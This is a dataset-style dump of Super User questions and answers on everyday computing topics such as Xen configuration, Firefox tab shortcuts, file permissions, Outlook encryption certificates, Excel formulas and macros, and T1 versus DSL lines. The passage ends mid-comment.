TOPIC_TITLE
stringlengths
15
156
CATEGORIES
stringlengths
2
199
POST
stringlengths
36
177
ANSWERS
stringlengths
0
51.8k
Where are Xen guest config files stored?
linux;virtual-machine;virtualization;xen;administration;linux;virtual-machine;virtualization;xen;administration
Where are Xen guest config files stored? Ask Question
1 The complete configuration is stored as XML in /var/xapi/state.dbIt's recommended to use only the xapi commands to edit the configuration. There is also a dbtool from citrix here http://support.citrix.com/article/CTX121564. I think the way the information is stored is specific to xenserver, howerver someone needs to confirm this. ShareImprove this answer Follow answered Feb 24, 2016 at 17:15PhlogiPhlogi19177 bronze badgesAdd a comment | 
shortcut key to detach a tab in firefox (move tab to new window)
firefox;keyboard-shortcuts;firefox;keyboard-shortcuts
shortcut key to detach a tab in firefox (move tab to new window) Ask Question
11 +50 Here's how to create your own keyboard shortcut to Detach a Firefox Tab to a New Window:Install the Keyconfig addonOpen the Keyconfig Preferences by pressing Ctrl+Shift+F12 (On Mac it may be ⌘ Cmd+Shift+F12)Click Add a new key at the bottom left of the keyconfig window.Replace the contents of the Name field with the name of this command:Detach Tab to New WindowPaste the following code into the /* CODE */ field:window.openDialog("chrome://browser/content/browser.xul","_blank","chrome,dialog=no,all",gBrowser.mCurrentTab);Click OK.Your new command will be marked as <Disabled> This means you need to set a keyboard shortcut for this command. Make sure your command is selected from the list of commands. Click inside the field at the bottom left of the window. It will highlight the contents and whatever keys you hit next will be entered inside that box. For example, you might use Ctrl+Alt+N. Or if you're a fan of Vim you might use Shift+Y.Click Apply and then click Close to close the keyconfig window. Test your keyboard shortcut by loading a window with at least 2 tabs and then use your new keyboard shortcut. The current tab should detach itself and form a new window.ShareImprove this answer Follow edited Apr 2, 2015 at 5:40 answered Mar 30, 2015 at 10:57NicNic18455 bronze badges22This still works... but have to use Dorando keyconfig <addons.mozilla.org/en-US/firefox/addon/dorando-keyconfig/…> – dGoMar 1, 2017 at 21:021Any way to do this in Firefox Quantum (v 69.0)? The extension doesn't work anymore. – Ekanshdeep GuptaSep 20, 2019 at 13:00Add a comment | ; 24 I found the best way to do this without any third party software. Basically, this is @exic solution with only 2 steps instead of 6 :Ctrl + L : Focus address barShift + Enter : Open url in new windowThis of course has the same con as @exic of loading a new page instead of taking the current one out.ShareImprove this answer Follow edited Sep 22, 2020 at 23:49 answered Jan 3, 2020 at 18:46AtralbAtralb46611 gold badge44 silver badges1111 bronze badges34Strictly speaking, this doesn’t move the tab, it copies the tab — it creates a new window at the same URL as the existing tab while leaving the tab alone. – G-Man Says 'Reinstate Monica'Jan 3, 2020 at 19:163@G-ManSays'ReinstateMonica' so you downvote me because you're wrong ? Again : - " this is exic solution [...]" - "This of course has the same con of loading a new page instead of taking the current one out." ... – AtralbJan 5, 2020 at 7:431@G-ManSays'ReinstateMonica' Coming back to this post, and I can't leave this conversation this way. You're unbelievably obnoxious and haughty while, even after a 5 message conversation, still unable to fully read/understand my post. How can you not comprehend this ==> *** " This of course has the con of loading a new page instead of taking the current one out. " ***. What you were obstinate to mention was already stated in my answer from the beginning. That said, adding Alt+Echap & Ctrl+W still makes it 2 steps quicker than the other one, but you needed to make an altercation out of it. – AtralbFeb 5, 2020 at 16:12Add a comment | ; 17 With Vimium-FF, it can be done by pressing W, i.e. shift + w. ShareImprove this answer Follow answered Apr 24, 2019 at 7:27AXOAXO9181212 silver badges1818 bronze badgesAdd a comment | ; 10 Been using this plugin, which fits the bill, shortcuts are customisable.https://addons.mozilla.org/en-GB/firefox/addon/tabdetach/ShareImprove this answer Follow answered Oct 29, 2020 at 16:38jpsjps20122 silver badges44 bronze badges31This one works well, and it only asks for "Access browser tabs" permission, which seems like the minimal required and doesn't worry me. ("The extension could obtain the URL, title, and icon from any tab" according to support.mozilla.org/en-US/kb/…) – Steve OnoratoJul 20, 2021 at 21:50This is just perfect, thank you! – TomAug 8, 2021 at 7:23does the job without doing anything else. great! – FlionAug 10, 2022 at 15:39Add a comment | ; 5 I like to use this shortcut sequence, which does what you want:Ctrl-L # Focus URLCtrl-C # Copy itCtrl-W # Close current tabCtrl-N # Open new windowCtrl-V # Paste Enter # Open URLObviously it has side effects:Your buffer is overriddenThe page is reloaded (don't do it if you already put input on that page)It won't work if the current page captures Ctrl-L (like the StackExchange post editor, which has it mapped to "Insert Hyperlink" :-D)But it doesn't require addons or code.ShareImprove this answer Follow edited Oct 11, 2019 at 4:14 answered Mar 25, 2019 at 9:41exicexic45955 silver badges99 bronze badges2What does "capture" mean in this context? Does it refer to something specific to browsers? Or does it just mean that Ctrl-L is ignored when the cursor is focused on an edit field, or some other element contained within the page? – Nicholas CousarOct 9, 2019 at 21:05Apparently a website may override shortcuts such as Ctrl-L. The StackExchange editor (the one you get when you answer a question) has Ctrl-L bound to "insert hyperlink", so you won't be able to focus the URL on that website or in that context. – exicOct 11, 2019 at 4:10Add a comment | ; 4 A solution with keyboard shortcuts that really move the tab, and does not only reopen it.Ctrl+L# Focus the adress barShift+Tab # Repeatedly until the tab is focused (3 times for me)Right-Click Shortcut Key # Open contextual menu of the tabv# Mo*v*e Tabw# Move to New *W*indowAnd, as described in the "Selection of Multiple Tabs" section of the Keyboard shortcuts Firefox Documentation, you can even easily select multiple tabs between step 2 and 3 by using ctrl + arrows and ctrl + space.Note: I thing that the last two steps (v and w) may depend on your firefox installation, but you can easily spot which key to press becausse this is the underlined letter in the corresponding action name.ShareImprove this answer Follow answered Apr 30, 2021 at 9:38paimepaime14122 bronze badges2This would be a great solution but I feel like 'Right-Click Shortcut Key' needs a bit of explenation. – JoeNov 22, 2021 at 10:56This is the key on the left of the right Ctrl key, a.k.a the "menu" key on this layout: en.wikipedia.org/wiki/British_and_American_keyboards#/media/… – paimeNov 24, 2021 at 7:09Add a comment | ; 2 In addition to @Nic's answer, use the following code to also close the detached tab from the original window:window.openDialog("chrome://browser/content/browser.xul","_blank","chrome,dialog=no,all",gBrowser.mCurrentTab);window.open('','_gBrowser.mCurrentTab').close();ShareImprove this answer Follow answered May 1, 2016 at 14:19Daniyal ShahrokhianDaniyal Shahrokhian15933 bronze badges1This seems to be for Chrome, not Firefox. – Niels BomNov 5, 2020 at 12:44Add a comment | ; 1 Two steps : simplest way to get this done is to SELECT the tab address by just clicking on the address bar then just press CTRL+SHIFT. 1. SELECT the tab address 2. Press CTRL+SHIFTShareImprove this answer Follow answered Apr 23, 2021 at 9:16NJENGAHNJENGAH11933 bronze badges2When I highlight the address and press Ctrl+Shift nothing happens for me. Also, in your screenshot it looks like its reloading the page which is undesirable. – chiliNUTApr 23, 2021 at 18:50It might be Shift+Enter instead of Ctrl+Shift, but yes it only duplicates the tab in another window – paimeNov 24, 2021 at 7:11Add a comment | ; 0 I use Alfred and built a workflow that starts with a hotkey to run this osascript (javascript)(thanks to James Robert who wrote the initial code which I adapted):// Origin: https://gist.github.com/jiaaro/c95e89ea5cacc6906040var sys_events = Application('System Events')var key_codes = { '→': 124, '←': 123, '↑': 126, '↓': 125, '⏎': 36, // Return '⇥': 48, // Tab '⌫': 51, // Delete '⎋': 53 // Escape}var modifiers = { '⌘': 'command down', '^': 'control down', '⌥': 'option down', '⇧': 'shift down'}function press(hotkey) { var using = [] while (hotkey.length > 1) { if (modifiers[hotkey[0]] == undefined) { throw new Error(hotkey[0] + ' is not a recognized modifier key') } using.push(modifiers[hotkey[0]]) hotkey = hotkey.slice(1) } if (key_codes[hotkey] != undefined) sys_events.keyCode(key_codes[hotkey], { using: using }) else sys_events.keystroke(hotkey.toLowerCase(), { using: using })}const sequence = [ { key: '⌘L' }, { key: '⌘C' }, { key: '⌘W' }, { key: '⌘⌥←' }, // I use specticle app to manage window locations { key: '⌘N', wait: 0.8 }, { key: '⌘⌥→' }, // I use specticle app to manage window locations { key: '⌘L' }, { key: '⌘V' }, { key: '⏎' }]for (const { key, wait } of sequence) { press(key) wait && delay(wait)}Now when I'm in chrome I run CMD-pagedown as my hotkey and it does the magic.ShareImprove this answer Follow answered Sep 5, 2021 at 2:55JimJim10111 bronze badgeAdd a comment | ; 0 I am on Ubuntu 22.04 and Firefox 105 and I use this keyboard shortcut to detach the current tab and move to a new window:Ctrl + Shift + SpaceShareImprove this answer Follow answered Oct 14, 2022 at 17:54PabloPablo14155 bronze badges1Doesn't work for me on Arch – bugrasanOct 15, 2022 at 21:06Add a comment | ; -3 For a list of all keyboard shortcuts in FireFox, visit this website. For information on tab shortcuts, scroll down about halfway. I believe the one you are looking for is Insert or Shift+Insert.ShareImprove this answer Follow answered Feb 24, 2015 at 4:13Alexander IassoAlexander Iasso322 bronze badges13I checked there first but didn't see anything. I should add that to the question. Insert and shift+insert don't do anything for me. – chiliNUTFeb 24, 2015 at 4:33Add a comment | 
How to fix a faulty old LCD that flickers?
lcd
How to fix a faulty old LCD that flickers? Ask Question
0 This question was at lifehacks.se.Why not take the monitor apart and see what needs to be pressed together? A little inspection would help. That way you know exactly what you're dealing with. Maybe a shim can be put inside allowing the body or case to hold it in place.First unplug. LCD monitors do not have residual voltage risk like monitors with tubes. Pay attention so you can put everything back! Look for screws and take them out. Remove all screws found before trying to separate. Even if all screws are out there may be plastic catches still holding it together. When you take it apart, components will be secured by other screws inside. Do not stretch any wires. Find the spot where disfunctionality exists and see what to do. When putting back together, make sure wires are not trapped or squeezed by the case or shell.ShareImprove this answer Follow answered Feb 24, 2015 at 3:35subjectivistsubjectivist53711 gold badge33 silver badges1313 bronze badgesAdd a comment | 
sudo chmod o+x but still can't run as regular user
linux;root;chmod;linux;root;chmod
sudo chmod o+x but still can't run as regular user Ask Question
1 To execute a file /path/to/file (and access it in general) the user account must be able to get to it first, i.e., for all parents of file the user must have the x permission. In your case, you would need to chmod +x /root /root/.cabal /root/.cabal/bin but a better approach would probably be to install cabal packages either locally (for the user that needs them) or globally if all users should have them. Please refer to the cabal manual for details. Also, see related questions here and here for more background on directory permissions.ShareImprove this answer Follow edited Apr 13, 2017 at 12:37CommunityBot1 answered Feb 24, 2015 at 7:54inzinz12133 bronze badges31Actually it was the fact that I can't cabal install pandoc locally, but only with sudo, that made me try this in the first place. – isomorphismesFeb 24, 2015 at 15:36Thanks for trying! sudo chmod a+x /root /root/.cabal /root/.cabal/bin /root/.cabal/bin/pandoc did allow me to execute as user. – isomorphismesFeb 24, 2015 at 15:38Glad it worked! – inzFeb 24, 2015 at 15:40Add a comment | ; 1 Could be all sorts of potential problems.Knowing more details about what the program might do could be useful. For instance, a program might not be permitted to write to a directory on a file system that is mounted as read-only, even if the files specify that Unix-style permissions would allow the file to be overwritten (when it is mounted read/write).Your Unix-style permissions settings for the file, that are set by chmod, look fine. I agree with that, based on the output you've shown. So let's try looking at some other things.Some quick ideas: mount may have noexec (check the /root mount point if it exists; my guess is most probably not, in which case you'll want to check the / mount point)Permissions caused by something else. e.g., first line of a script file says !#/bin/my-interpretor but you don't have permissions to run my-interpretorIf you're getting a permissions error, perhaps a file runs my-interpretor, but then the file runs another program which is erroring out.Frank's answer notes SELinux. So there may be sources of permissions other than just what's on a file. If the file is a script file, try sourcing it. (That is: instead of running "/path/file", run ". /path/file" -- with a period and a space and then a filename. Or the "source" command; details might be shell-dependent.Maybe another possible reason could be related to "ulimit -a"? (This may be a command internal to a shell, so don't just "man ulimit" -- instead, "man $SHELL")Maybe some of those ideas are a bit off, but those are just some of the ideas that readily pop into my head. So, I'm not saying these are all possible answers, or even that all of these are definitely possible; they're just some ideas and maybe one of them is right.Troubleshooting thoughts: Check log files. Check return value ( echo $? ). What if root runs the program? What if a person uses "sudo"? What if a person in "wheel" group runs the program?ShareImprove this answer Follow edited Feb 24, 2015 at 17:06 answered Feb 24, 2015 at 7:00TOOGAMTOOGAM15k33 gold badges4040 silver badges5858 bronze badges1Well, I'm testing with /root/.cabal/bin/pandoc -v so it shouldn't be write permissions on a target file. – isomorphismesFeb 24, 2015 at 15:34Add a comment | 
Cannot add clip from samba share
samba;kdenlive;samba;kdenlive
Cannot add clip from samba share Ask Question
0 I've fixed the issue mounting by hand instead of rely on dbus/gvfs whitchcraft, and then I could add the clipsShareImprove this answer Follow answered Feb 24, 2015 at 18:57sebelksebelk25733 silver badges1111 bronze badgesAdd a comment | 
How can safely I test a UPS that doesn't have a working battery?
ups;ups
How can safely I test a UPS that doesn't have a working battery? Ask Question
6 No, connecting the + and - together won’t work. In fact it will put a dead short across the UPS’s battery charger. If you’re lucky the UPS will detect this and not try to send charging current through the dead short. If you’re not lucky the charging circuit will be damaged. You’ll either have to sell it as-is and untested, or else get a battery for it. Edit - added: Consider: Even if the UPS will pass AC power through without a battery connected (as some will), then what exactly would you be demonstrating that works? At that point it is just a line-interactive AC voltage regulator (assuming it has that function). You don't know if the battery charging circuit works, and you don't know if the inverter (battery to AC output) side works, and together those are pretty much everything in a UPS. ShareImprove this answer Follow edited Feb 24, 2015 at 3:31 answered Feb 24, 2015 at 3:19Jamie HanrahanJamie Hanrahan22.7k66 gold badges6060 silver badges9292 bronze badgesAdd a comment | 
GPG public key created with GnuPG is rejected by MS Outlook 2010, why?
microsoft-outlook;encryption;microsoft-outlook-2010;gnupg;pgp;microsoft-outlook;encryption;microsoft-outlook-2010;gnupg;pgp
GPG public key created with GnuPG is rejected by MS Outlook 2010, why? Ask Question
3 You're confusing two different digital certificate systems. Certificates are not interchangeable between the two systems.OpenPGPOpenPGP provides a non-hierarchical trust system, which does not require central certificate authorities. It is the more powerful, but also more complex system. Most mail clients do not support it out of the box, and require add-ons for using it.Everybody can create his own key, and get it signed by others.X.509 and S/MIMEThe other option for digital certificates is X.509, used in S/MIME for e-mail, but also SSL/TLS for transport encryption of HTTP and other protocols. Here you have a bunch of certificate authorities (actually usually multiple hundred) that you trust in (by default settings of your computer/mail client), and that can vouch for others (issue certifications) which you automatically trust.This is a good fit for (hierarchically organized) companies, which probably is the reason that it has much more wide-spread implementation. Outlook, Thunderbird and most other (reasonable) mail clients support it by default.There are lots of certificate authorities where you could buy such a certificate (valid for a given timespan). I'm only listing two especially interesting ones:StartSSL is an Israel-based company issuing free basic certificates for mail and servers, but without validating your real ID (only your mail address). The advantage is that they are trusted by all major browser and operating system vendors. Certificates including your real name are available for a flatrate of around 60$ per year. Be aware revoking a certificate (eg., in case some third got access to it and can now write e-mail in your name) is around 25$ (which is also charged by a lot of other companies).CAcert is a "community driven certificate authority". They verify your identity by other community members agreeing to do so, so you will have to meet others and show your ID to get your name into the certificate (for details, read their website). Issuing certificates and revocations are always free, but the downside is their root certificate is not trusted by major operating systems and mail clients.Might be feasible for limited groups or private use, but be aware of this problem if using it commercially.ShareImprove this answer Follow edited Jul 30, 2022 at 23:03Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges answered Feb 24, 2015 at 10:06Jens EratJens Erat17.2k1414 gold badges6161 silver badges7474 bronze badges5StartSSL only offers 128/256 bit certificates. My GnuPG cert is 2048 bits. Can you suggest a way I can get 2048 (or 4096?) bit keys to work with outlook? This is a medical app that needs to provide the highest levels of security. – CodeMedFeb 24, 2015 at 17:00I think you're confusing the hash sum with RSA key size. StartSSL does not accept any RSA keys smaller 2048 bits. Anyway: if security/confidentiality is crucial for any business (or medical, whatever) application, get (and pay) somebody familiar with the subject. There is an unbelievable number of ways to fail at setting up encryption, far beyond the scope of any tutorial and probably even text book. – Jens EratFeb 24, 2015 at 17:08Can I just use OpenSSL to create the certificate? As in this posting? security.stackexchange.com/questions/17583/… – CodeMedFeb 24, 2015 at 17:08I don't think StartSSL accepts certificate requests for client certificates. During the certification process, the key is generated within the browser and never sent to StartSSL (or anybody else). – Jens EratFeb 24, 2015 at 17:09(since this was necroed already) In 2016 StartSSL/StartCom was sold to WoSign in China, who were caught issuing fradulent certs and within a year distrusted by essentially everybody. LetsEncrypt provided a good (arguably better) gratis substitute for SSL/TLS, but not for S/MIME. – dave_thompson_085Jul 31, 2022 at 1:54Add a comment | ; 1 Outlook 2010 can only handle S/MIME out of the box.If you want to use OpenPGP, you need a plugin.For GnuPG there are three optionsOutlook Privacy Plugingpg4oThe first one is free and open source but is only for the brave. The same applies to the plugin that is part of the gpg4win project.If need a good working one you should try gpg4o, which is not free, but runs hazzle free.All of them should be able to import the key that you have created under your CentOS.ShareImprove this answer Follow answered Mar 24, 2015 at 14:47user396309user3963097611 bronze badgeAdd a comment | ; 0 Outlook does NOT use normal (pgp) private keys for signing emails. It uses SSL style certificates and their associated private keys (signed by a trusted third party) to do the work. Outlook needs this certificate to be in pkcs12 format. (the Linux "file" command can confirm this)This has the advantage/disadvantage that you don't get a 'web of trust' to confirm that the private key belongs to who you think it does and the advantage/disadvantage that you're just trusting the "trusted third party".The big disadvantage is that you'll have to pay for the Outlook certificate.ShareImprove this answer Follow answered Feb 24, 2015 at 9:12user3710044user371004426911 silver badge66 bronze badgesAdd a comment | ; 0 Not 100% sure, but if the certificate works elsewhere this could be a simple case of DOS line ending formatting verus Linux line ending formatting mucking up the works in Outlook 2010.I would recommend installing the unix2dos utility on CentOS like this:sudo yum install unix2dosAnd then from the command line in CentOS running this unix2dos command with the -n flag:unix2dos -n username_pubkey.cer username_pubkey_dos.cerThen try importing the username_pubkey_dos.cer into Outlook 2010.ShareImprove this answer Follow edited Feb 24, 2015 at 19:28 answered Feb 24, 2015 at 6:19Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges6I am exploring this now. I will report back with results within 15 minutes. Please note, however, that the Thunderbird version runs on windows despite being created on CentOS and never having been processed by unix2dos. – CodeMedFeb 24, 2015 at 6:27@CodeMed True about Thunderbird. But keep in mind: Microsoft generally does not care about anything that exists outside of its platform while Thunderbird is cross platform and Linux friendly. – Giacomo1968Feb 24, 2015 at 6:36Please see the EDIT at the end of my OP. – CodeMedFeb 24, 2015 at 6:37@CodeMed Well, that is my best idea. Like I said in my answer, “Not 100% sure…” Best of luck figuring out how to deal with this. – Giacomo1968Feb 24, 2015 at 6:531The correct syntax is unix2dos -n username_pubkey.cer username_pubkey_dos.cer to convert text to dos format. However, this approach still resulted in the same Outlook problem, most likely due to issues raised by others. I am currently researching options proposed in other answers. Thank you for getting me to install unix2dos. I will use it for other things later. – CodeMedFeb 24, 2015 at 19:13 | Show 1 more comment
How to search a range of cells for specific txt, then copy to adjacent cell
microsoft-excel-2010;worksheet-function;vba;microsoft-excel-2010;worksheet-function;vba
How to search a range of cells for specific txt, then copy to adjacent cell Ask Question
0 I see several errors in your ways, for instance it is considered bad practice both to not specify where your cells and ranges are located more explicitly than you do and to use .select. Some of the Select-statements are also superfluous, you do not need to select the cell when you qualify it with a range-reference in your code. And while I'll applaud you for actually declaring your variables, you should also say what you declare them as. In this instance, either Dim i as Long or Dim i as Integer (the first one is slightly better for complicated reasons).The syntax you use for specifying ranges is also invalid, as DarkMoon mentions, and although you could have achieved something like what you want doing e.g. Range("G"&CStr(i)) I would really urge you to include at least what spreadsheet you are on first. I.e. Worksheets("Sheet1").Range("G"&CStr(i))Here is how I would solve what you're trying to do, with a few comments on what the different bits of code do. You'll note that I didn't include the messagebox which is in your code, in case you get a lot of hits over the 1000 rows, I bet you don't want to click that OK-button more than a few 100 times ;)Option ExplicitSub test() Dim range_to_search As Range, string_to_find As String, found_cell As Range, first_address As String ' Turn off a couple of settings to make the code run faster Application.ScreenUpdating = False Application.EnableEvents = False Application.DisplayStatusBar = False Application.Calculation = xlCalculationManual ' Set the value to search for, and the range to search in string_to_find = "CR" Set range_to_search = Worksheets("Sheet1").Range("G1:G1000") ' Find the first cell in the range containing the searchstring Set found_cell = range_to_search.Find(What:=string_to_find, After:=range_to_search(range_to_search.CountLarge, 1), LookIn:=xlValues, LookAt:=xlPart, MatchCase:=False) ' No point in doing anything if no cell containing the string is found If Not found_cell Is Nothing Then ' This isn't strictly necessary since we clear the cells as we go along, but at the end of the macro, we'll use this string to make sure we don't loop over the range again and again first_address = found_cell.Address ' Start of loop Do ' Replace the string we're searching for with a zero-length string found_cell = Replace(found_cell, string_to_find, "", 1, -1, vbTextCompare) ' Copy the edited value to the adjacent column found_cell.Copy Destination:=found_cell.Offset(0, 1) ' Clear the cell found_cell.ClearContents ' Find a possible next value Set found_cell = range_to_search.FindNext(found_cell) ' If we haven't found a new cell containing the searchstring, we exit the loop If found_cell Is Nothing Then Exit Do ' Have we reached the top again? If not, keep looping. Loop While found_cell.Address <> first_address End If ' Turn the settings back on Application.EnableEvents = True Application.ScreenUpdating = True Application.DisplayStatusBar = True Application.Calculation = xlCalculationAutomaticEnd SubShareImprove this answer Follow edited May 23, 2017 at 12:41CommunityBot1 answered Feb 26, 2015 at 14:20eirikdaudeeirikdaude92822 gold badges88 silver badges2424 bronze badgesAdd a comment | 
Detecting if an image was generated from unlicensed software
adobe-photoshop;license;adobe-illustrator;adobe-photoshop;license;adobe-illustrator
Detecting if an image was generated from unlicensed software Ask Question
3 Is it possible to determine an image (any graphic output from these software) was made from an unlicensed/pirated software?No. In general the files created by the software such as Adobe Photoshop and Illustrator won’t have any signature connecting you to the source—and licensing status—of any software you use.If not then when these software providers will knew about it?Since most all major software nowadays—such as Adobe products—“phone home” when you use it to check for updates or license validity, chances are high that when you first install it and get it running it will definitely be contacting the software publisher’s servers to check for updates and perform basic licensing checks.The end result of this could be that the license you are using with this software will be blacklisted and eventually stop working. Or perhaps your IP address and system information will be shared with the software publisher and possibly be used in potential legal action against you and other pirates. Heck, a software publisher could use your IP address and invoke DMCA procedures to contact your ISP and have them surrender your personal contact info as a part of a larger legal action.That’s the basic risk you run when you use illegally acquired software. And that is a risk which I personally consider to be a fairly major risk.ShareImprove this answer Follow edited Feb 24, 2015 at 2:37 answered Feb 24, 2015 at 2:32Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges0Add a comment | 
Transfer speed when moving files around the file system
hard-drive;measurement;hard-drive;measurement
Transfer speed when moving files around the file system Ask Question
0 It is a best guess by your operating system (whatever you use) as to how rapidly the file is being copied. It is not the HDD write speed or the SATA transfer speed, although if those are improved by an upgrade, files will move faster. Those and multiple other factors come into play in the calculation. A discussion of several methods of calculation may be found at https://stackoverflow.com/questions/1152208/computing-estimated-times-of-file-copies-movements and a Windows-centric discussion may be had at http://blogs.msdn.com/b/oldnewthing/archive/2004/01/06/47937.aspxShareImprove this answer Follow edited Feb 24, 2015 at 2:27 answered Feb 24, 2015 at 2:16K7AAYK7AAY9,32944 gold badges3333 silver badges6161 bronze badgesAdd a comment | ; 0 It is both and neither - its the response time the OS believes the hardware is taking, and is governed by the speed of the HD, the SATA transfer speed, the hard drive cache, the disk write-back policy and the filesystem.It is possible to move a file within a filesystem without ever touching the actual file by simply updating the pointers in the file system table - much like doing a rename, and this is pretty instantaneous - Of-course, this is not always possible, for example when moving the file between partitions on the same disk, or if the OS is doing the move by way of copy then delete.For small files moved between 2 filesystems/copy+deleted, it is entirely possible the hard drive will receive the file into cache, and then tell the OS that the move is complete - before its written to the disk. I'd imagine that the default on most OS's would be to disable this functionality unless the disk has a battery backup, super-caps big enough to ensure the write completes or, in the case of an SSD hybrid is written to the SSD.ShareImprove this answer Follow answered Feb 24, 2015 at 3:34davidgodavidgo66.3k1212 gold badges9999 silver badges155155 bronze badgesAdd a comment | 
Create CSV file from Excel with delimiter other than comma?
microsoft-excel-2007;csv;microsoft-excel-2007;csv
Create CSV file from Excel with delimiter other than comma? Ask Question
2 List separator set in Language & Region settings will not work if you have Decimal Separator set to same character.So if you have , set as decimal separator set there - you cannot have , as list separator and Excel will use default ;.You have to use . as decimal separator or write some macro that will save your document in desired format.ShareImprove this answer Follow answered Nov 26, 2014 at 15:56KamilKamil2,61411 gold badge1818 silver badges2828 bronze badges7I need the decimal separator to stay comma, because there are some decimals in the CSV. So ideally, I need the CSV to be generated with a comma delimiter and with all columns being surrounded by " " (to escape the decimals separator which is comma). I believe a macro is the quickest way to do this. The problem is: I've never created a macro before ... ;) – yo_hahaNov 26, 2014 at 16:11@yo_haha So you need a macro that will build whole CSV content. – KamilNov 26, 2014 at 18:041@yo_haha If you don't want to mess up with macros - maybe save your file with default settings and modify it by some external tool (there are many CSV converters). – KamilNov 26, 2014 at 18:59I'll try CSV converters before the macros :) Thanks – yo_hahaNov 27, 2014 at 8:11Do you've got in mind the name of some converter that allows delimiter changing? – yo_hahaNov 27, 2014 at 8:20 | Show 2 more comments
Windows 8.1 Pro restarting in VirtualBox boot from ISO (virtualization enabled)
virtualbox;virtual-machine;virtualization;virtualbox;virtual-machine;virtualization
Windows 8.1 Pro restarting in VirtualBox boot from ISO (virtualization enabled) Ask Question
0 So as it turns out, after making these changes:System Configuration > Device Configurations > Virtualization Technology <-- ENABLE this System Configuration > Set Security Level > Data Execution Prevention <-- set to Change System Configuration > Set Security Level > Virtualization Technology <-- set to ChangeI also had to remove the laptop battery and leave it like that for awhile. After starting up the laptop again Windows finally booted from the ISO properly and I could continue with the installation.ShareImprove this answer Follow answered Nov 26, 2014 at 16:27radu.luchianradu.luchian122 bronze badgesAdd a comment | 
Can I switch to DSL if I already have a T1 line? [closed]
dsl;t1;dsl;t1
Can I switch to DSL if I already have a T1 line? [closed] Ask Question
1 For almost all telcos nowadays, modern T1 service is actually provided using HDSL (or HDSL2 or HDSL4) equipment. Traditional T1 requires that the two copper pairs to be conditioned lines (e.g. bridged taps have to be removed), whereas xDSL does not. HDSL has been replacing traditional T1 equipment since the mid 1990s, as HDSL is easier and less expensive to install and maintain.By "DSL" you presumably mean ADSL. All xDSL technologies are distance limited, but may be extended with "amplifier" or repeater/regeneration units. Apparently there are ADSL "repeaters" according to this wikipedia article on ADSL loop extender. There is a limit to the number of "repeaters" that can be installed. An older generation of HDSL repeaters was limited to 2 units, and the next generation (that I worked on) allowed three (which could cover the 7 miles in your case). I am thinking it would work over the same trunk with those repeaters.It's not a "trunk", but one or two pairs of copper wire. ADSL and POTS (plain old telephone service, i.e. voice) would only use one pair.The T1 or HDSL repeaters are not reusable or adaptable for ADSL.Since I have this T1 line now, when my contract is up can I switch to a DSL provider which would obviously be less expensive? Only your telco can answer this question. A change in service would require equipment replacement at multiple locations, so a "DSL provider" cannot just step in like in an urban situation. Perhaps you could renegotiate the price of the T1 service, assuming that the cost of the original installation was amortized and now paid back. Back in the day I was told that telcos were still billing for T1 service as if they were still using expensive traditional T1 equipment, even though the replacement HDSL had significantly lowered their costs.ShareImprove this answer Follow edited Nov 26, 2014 at 23:30 answered Nov 26, 2014 at 23:23sawdustsawdust16.9k11 gold badge3333 silver badges4646 bronze badges1Thanks @sawdust, hopefully the amortization has been paid back, as you state above. I'd like more throughput for less money, but wouldn't we all. :) – MidwireNov 28, 2014 at 0:37Add a comment | ; 0 DSL and T1 are different things.DSL comes in to your home over normal phone wiring. Among other factors, the further you are from the phone company's central office, the lower your maximum speed is. It's possible you are too far from the phone company to support any DSL speed higher than dial-up speeds. If your nearest neighbors cannot get DSL, you probably won't either.I haven't worked with T1's before and am not sure how they work on the provider end, but I'm certain the equipment on the provider end to provide DSL and T1 are different, even if T1 wiring is similar to phone line wiring (some Google searches seemed to suggest that). Assuming the same company provides your T1 and DSL, they may not be able to simply plug your T1 into their DSL equipment and magically give you DSL.So it may not be a simple thing on the provider end to simply send DSL over the T1 wiring coming in to your location.ShareImprove this answer Follow answered Nov 26, 2014 at 15:40LawrenceCLawrenceC71.9k1515 gold badges123123 silver badges211211 bronze badges11"if T1 wiring is similar to phone line wiring" -- Traditional T1 (and HDSL) uses 2 copper pairs, whereas ADSL uses only 1 pair (as well as SHDSL). Real T1 requires that the two pairs to be conditioned lines (e.g. bridge taps have to be removed), whereas HDSL (T1 replacement) and ADSL do not. – sawdustNov 26, 2014 at 21:00Add a comment | 
Excel Conditional sum on same row
microsoft-excel;worksheet-function;microsoft-excel;worksheet-function
Excel Conditional sum on same row Ask Question
3 SUMIF function does a conditional sum based on values in another range, e.g. for your example you can use this formula in E4=SUMIF(A1:A3,"X",E1:E3)ShareImprove this answer Follow answered Nov 26, 2014 at 16:15barry houdinibarry houdini10.8k11 gold badge2020 silver badges2525 bronze badgesAdd a comment | 
Hobocopy VSS PST File Backup Script
microsoft-outlook;backup;microsoft-outlook;backup
Hobocopy VSS PST File Backup Script Ask Question
1 If you use the "/incremental" parameter you need the "/statefile" one. It is explained here https://github.com/candera/hobocopyShareImprove this answer Follow answered Apr 27, 2015 at 14:21Juanma RoblesJuanma Robles1111 bronze badge1While this may answer the question, it is better to include a more detailed description of the answer here and provide the link for reference. – G-Man Says 'Reinstate Monica'Apr 27, 2015 at 16:29Add a comment | 
PCI Memory Read Command
pci;pci
PCI Memory Read Command Ask Question
0 Basic answerMany devices have some memory used to communicate with another devices or CPU.RAM memory is not only memory in your computer. It is just "general purpose memory".Hard disk controller has some memory used as buffer. If you are saving file - your CPU puts data into memory of hard disk controller, puts data into control registers and disk controller starts working on it. CPU just puts data into that disk controller memory and is not busy anymore.Similar with graphics cards, sound cards, network cards. They must have some memory in order to work.Lets say, we are building very simple "graphics card" for PCI that supports 1 pixel "screen" and that pixel is just a LED with 8-bit brightness control (0-255). We connect that diode to some microcontroller, and add 1 byte memory outside. We connect that memory to PCI and microcontroller.Our microcontroller reads memory every frame and controls our LED according to data read from memory. On computer side - we just use PCI memory write command and we write 0-255 numbers into that memory. This is how simple PCI devices work. All information above is very simplified for better understanding.More advanced answer (if you already know something about PC hardware)In PCI there are few adress spaces. Memory addresses are 32 bit wide (there is also 64-bit PCI-X / not PCI Express!), support caching and can be burst transactions.There are also I/O addresses and they are compatybile Intel x86 architecture's I/O port address space.ShareImprove this answer Follow edited Nov 26, 2014 at 15:25 answered Nov 26, 2014 at 15:19KamilKamil2,61411 gold badge1818 silver badges2828 bronze badges3thanks for ur answer but I'm not sure that i understood the mechanism, why pci slot has 32 pins for addressing? In x86 architecture I/O instructions(in,out,ins,outs) purpose is accessing I/O devices port registers,u can check the status of a peripheral 